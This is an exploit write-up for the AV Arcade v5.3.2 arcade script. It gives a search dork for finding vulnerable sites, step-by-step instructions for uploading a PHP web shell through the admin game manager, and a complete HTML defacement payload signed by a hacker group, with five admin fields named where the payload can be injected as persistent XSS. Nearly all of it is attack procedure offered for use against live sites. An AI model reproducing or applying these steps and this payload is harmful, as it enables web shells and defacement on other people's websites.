AV Arcade v5.3.2 Multiple Vulnerabilities

# Exploit Title : AV Arcade v5.3.2 Multiple Vulnerabilities
# Dorks : inurl:/task/allnews.html

POC :
1.Shell Upload
[1] Login As Administrator.
[2] Go To http://your site/<av arcade dir>/admin/?task=manage_games
[3] Click (+) Add A Game.
[4] Upload A File & Image (Browse Your Php Shell).
[5] Submit.
[6] Go To http://your site/<av arcade dir>/games/images/<your shell>.php 

2.Persistent XSS
XSS Defacing Script (Deface With Layer)

<DIV align=left>
<DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px;  1; LEFT: 1px; BORDER-LEFT: #000000 1px; WIDTH: 1500px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000">
<br /><br />
<br>
<center>
<font face="Arial" color="red" size="4"><strong><br><br><br>Defaced By : X-Cisadane
<br>
</center>
<font face="Courier New" color="#FF0000" size="3"><center>Greetz To : Cisadane Hacker Community,XCode,Muslim Hackers,Dunia Santai</center></font>
<center><img src="http://obnoxiousgamer.files.wordpress.com/2010/01/jollyroger.gif"></img></center>
<center><font face="arial" size="3" color="#FF0000">
<marquee behavior="alternate" scrolldelay="100" style="width: 90%">Please fix your hole!
</li>
</ul>
</td>
</tr>
</table>
</div>

#Section : Game [1] Login As Administrator. [2] Go To http://your site/<av arcade dir>/admin/?task=manage_games [3] Click (+) Add A Game.

[4] Insert XSS Defacing Script Into These Field : Description & How To Play. [5] Insert Your Game, Pics, Etc. [6] Submit. [7] Go to your game, click "Game Name".

#Section : Pages [1] Login As Administrator. [2] Go To http://your site/<av arcade dir>/admin/index.php?task=manage_pages [3] Click (+) Add A Page. [4] Insert XSS Defacing Script Into Page Content. [5] Submit. [6] In The Page Manager Click "Edit" (pencil), Edit your desire page & click Submit. [7] Go to your page, click "Page Name" or see The Page ID, Example Page ID = 2 Then Go to http://your site/<av arcade dir>/page/<PAGE ID>/<PAGE NAME>.html Or http://your site/<av arcade dir>/index.php?task=view_page&id=<PAGE ID>

#Section : News [1] Login As Administrator. [2] Go To http://your site/<av arcade dir>/admin/index.php?task=manage_news [3] Click (+) Add News. [4] Insert XSS Defacing Script Into News Content. [5] Submit. [6] In The News Manager Click "Edit" (pencil), Edit your desire news & click Submit. [7] Go to http://your site/<av arcade dir>/task/allnews.html  

#Section : Categories [1] Login As Administrator. [2] Go To http://your site/<av arcade dir>/admin/?task=manage_categories [3] Click (+) Add Category. [4] Insert XSS Defacing Script Into Available Field. [5] Submit. [6] Refresh current page, voila! [7] Go to http://your site/<av arcade dir>/

#Section : Links
[1] Login As Administrator.
[2] Go To http://your site/<av arcade dir>/admin/?task=manage_links
[3] Click (+) Add a Link.
[4] Insert XSS Defacing Script Into Description Field.
[5] Submit.
[6] Go to http://your site/<av arcade dir>/task/links.html